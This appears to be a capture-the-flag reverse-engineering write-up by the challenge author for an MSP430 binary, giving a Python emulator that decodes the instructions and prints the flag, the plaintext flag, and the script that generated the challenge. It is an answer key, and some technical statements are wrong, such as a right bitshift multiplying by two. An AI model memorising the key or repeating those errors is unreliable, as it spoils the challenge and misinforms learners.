there’s adds and subs which are quite straightforward. we also only use the numbers 1, 2, 4, 8 bc of the msp430’s constant generator register, which is not entirely necessary to know (but that’s why the instructions are able to fit in a word each).

the other thing that might be confusing is the rla instruction (rotate left), which rotates the bits in the register one position to the left. as we all know a bitshift to the right is equivalent to multiplying by two - so, all the register ops amount to is just adds, muls, and subs.

now we will work on actually emulating the instructions by parsing the raw bytes. let’s eyepower some of these - of course, you can breakdown the individual bits that make up the instructions and actually that would be a lot more elucidatory but shhhhhhhhhhhh:

rla:

this one’s easy because it’s always a shift by so we don’t need to worry about parsing constants.

54           rla     r4
55           rla     r5
56           rla     r6
57           rla     r7

here is some example instructions i pulled from the binary - i hope the pattern is immediately obvious, where the instr format is 0x5x with x being the number of the register in hexadecimal.

add:

1a 53           inc     r10             ;
2b 53           incd    r11             ;
2c 52           add     #4,     r12     ;r2 As==10
3d 52           add     #8,     r13     ;r2 As==11

so add1 and add2 actually get optimised into these inc and incd instructions, with the opcode being 53 instead of 52 for generic adds. the general format is this:

# inc
------ 1a ------ (little endian)
0011 0001 1010
|
0011 -> opcode for inc 
-> corresponds to the increment amount. for inc, we sjut take this value as is
-> register number in hex

#add
------ 2c ------
0010 0010 1100

0011 -> opcode for add
-> corresponds to the increment amount. we take this as an exponent to 2 before adding
-> register number in hex

i hope that this is reasonable to understand. we can also exactly apply this to decd and sub, it’s the exact same idea:

83           dec     r5              ;
83           decd    r6              ;
82           sub     #4,     r7      ;r2 As==10
82           sub     #8,     r8      ;r2 As==11

we can see that it’s the exact same! just with 83 and 82 as opcodes instead. honestly, armed with this, we’re literally already done and can write an emulator. let’s do that.

binary_bytes = open('rev.bin', 'rb').read()
regs = [0 for _ in range(0xf)]

opcodes = {

    0x54: lambda reg, val: reg<<1,          # rla
    0x53: lambda reg, val: reg + val,       # inc
    0x52: lambda reg, val: reg + (2**val),  # add
    0x83: lambda reg, val: reg - val,       # dec
    0x82: lambda reg, val: reg - 2**val,    # sub
    0xe4: lambda reg, val: reg ^ reg        # xor

}

prev_reg = 4

instructions = []

for idx in range(0, len(binary_bytes) - 1, 2):
    word = binary_bytes[idx:idx+2].hex()
    if word == '3e40':
        instr_hex = binary_bytes[idx+2:idx+4].hex()
        op, arg = binary_bytes[idx+3], binary_bytes[idx+2]
        value, reg = (arg & 0b11110000) >> 4, (arg & 0b1111)
        # gross patch
        if 0x54 < op < 0x60: op = 0x54
        if 0xe4 < op < 0xf0: op = 0xe4
        if op in opcodes:
            instructions.append((instr_hex, op, opcodes[op], value, reg))

prev_reg = 4
flag = b''
for i in instructions[::-1]: # we flip because of LIFO
    instr_hex, op_num, op, value, reg = i
    if op_num >= 0xe4:
        flag_chunk = regs[prev_reg].to_bytes(2, byteorder='little')
        flag += flag_chunk
    regs[reg] = op(regs[reg], value)
    prev_reg = reg
flag += regs[prev_reg].to_bytes(2, byteorder='little') 
print(flag.decode(errors='ignore'))

so this will actually just print the flag but let’s go over some details that makes this work: the flag is calculated and stored as ascii bytes in the registers, and we iterate through registers 4 through 11 twice.

i didn’t want to encode multiple ops for the rla and xor so i just patch it into mapping to the same op. also we have to account for the order of the bytes.

to be honest it would be easier to parse the objdump output directly but this is more.. elucidatory i suppose. anyways yeah that’s basically it for the chal - just run that script and you get the answer.

for completeness sake here is the script i used to write the actual binary dynamically. i was going to do it manually but i figured it would be a cool exercise to actually ‘write’ my own assembler (for a limited amount of opcodes, that is)

flag = b"CyberBlitz2025{d3@th_4nd_t3x&s$}"
chunks = [flag[n:n+2] for n in range(0, len(flag), 2)]
func = lambda x: int.from_bytes(x, byteorder='little')
flag_chunks = [*map(func, chunks)]

from functools import lru_cache

CONSTS = [8, 4, 2, 1]

from collections import deque

CONSTS = [8, 4, 2, 1]
OPS = ['+', '-', '*']

def eval_op(a, op, b):
    if op == '+': return a + b
    if op == '-': return a - b
    if op == '*': return a * b
    raise ValueError(op)

def eval_left_to_right(expr):
    """Evaluate expression left-to-right without operator precedence"""
    tokens = []
    current = ''
    
    # Tokenize the expression
    for char in expr:
        if char in '+-*':
            if current:
                tokens.append(int(current))
                tokens.append(char)
                current = ''
            else:
                tokens.append(char)
        else:
            current += char
    if current:
        tokens.append(int(current))
    
    # Evaluate left-to-right
    result = tokens[0]
    for i in range(1, len(tokens), 2):
        op = tokens[i]
        next_val = tokens[i + 1]
        if op == '+':
            result += next_val
        elif op == '-':
            result -= next_val
        elif op == '*':
            result *= next_val
    
    return result

def find_min_expr(n, limit=65535):
    """
    BFS for minimal left-to-right expression using constants {8,4,2,1} and +,-,*
    Returns expression string without parentheses.
    """
    from collections import deque
    
    q = deque()
    visited = {}
    
    # Start with single constants
    for c in CONSTS:
        expr = str(c)
        q.append((c, expr, 0))
        visited[c] = 0
        if c == n:
            return expr, 0

    while q:
        val, expr, ops = q.popleft()
        
        if ops > 15:  # Reasonable limit
            continue
            
        for c in CONSTS:
            for op in OPS:
                # For left-to-right evaluation, we can compute directly
                if op == '+':
                    new_val = val + c
                elif op == '-':
                    new_val = val - c
                elif op == '*':
                    new_val = val * c
                
                # Check bounds
                if abs(new_val) > limit:
                    continue
                
                new_ops = ops + 1
                new_expr = expr + op + str(c)
                
                # Verify the expression evaluates correctly left-to-right
                if eval_left_to_right(new_expr) != new_val:
                    continue
                
                # Check if we've seen this value with fewer ops
                if new_val in visited and visited[new_val] <= new_ops:
                    continue
                
                visited[new_val] = new_ops
                
                if new_val == n:
                    return new_expr, new_ops
                
                q.append((new_val, new_expr, new_ops))
    
    return None, None

mappings = { 
    '+': 0x50,
    '-': 0x80,
    '*': 0x50
}

combine = lambda x, y: (x << 8) | y

def parse_into_asm(expr, reg):
    bytecode = [combine(0xe0 | reg, reg)]

    for i in range(0, len(expr), 2):
        op, val = expr[i:i+2]
        val = int(val)
        if op == '+' or op == '-':
            if op == '+': opcode = 0x50
            else: opcode = 0x80
            if val <= 2:
                opcode = opcode | 0x3
                argument = (val << 4) | (reg)
            else:
                opcode = opcode | 0x2
                argument = (([1, 2, 4, 8].index(val)) << 4) | reg
            bytecode.append(combine(opcode, argument))
        if op == '*':
            opcode = 0x50 | reg
            instr = combine(opcode, reg)
            for i in range([1, 2, 4, 8].index(val)):
                bytecode.append(instr)
    return [*map(hex, bytecode)]

boilerplate = [
    '.section .reset, "a"',
    '   .word start',
    '.text',
    'start:',
    'mov pc, R13',
    'mov #0x2000, sp',
    'mov sp, R15',
    'mov.w #0x4d00, R14',
    'push R14',
    'mov.w #0x4303, R14',
    'push R14'
]

actual_commands = []
for idx, i in enumerate(flag_chunks):
    expr = '+' + find_min_expr(i)[0]
    instrs = parse_into_asm(expr, (idx % 8) + 4)
    print(expr, instrs)
    for i in instrs:
        actual_commands.append(f'mov.w #{i}, R14')

# fucking lifo!!!
for i in actual_commands[::-1]:
    boilerplate.append(i)
    boilerplate.append('push r14')

boilerplate.append('mov.w sp, pc')

import subprocess
with open('rev.S', 'w') as rev_output:
    rev_output.write('\n'.join(boilerplate))

subprocess.run(['./build.sh', 'rev'])

you can literally see where the gpt slop starts and ends lol (bc i didnt want to write breadth-first-search to get minimal instructions given my self-imposed constraint on the limited instruction set i just didnt Feel Like Doing This)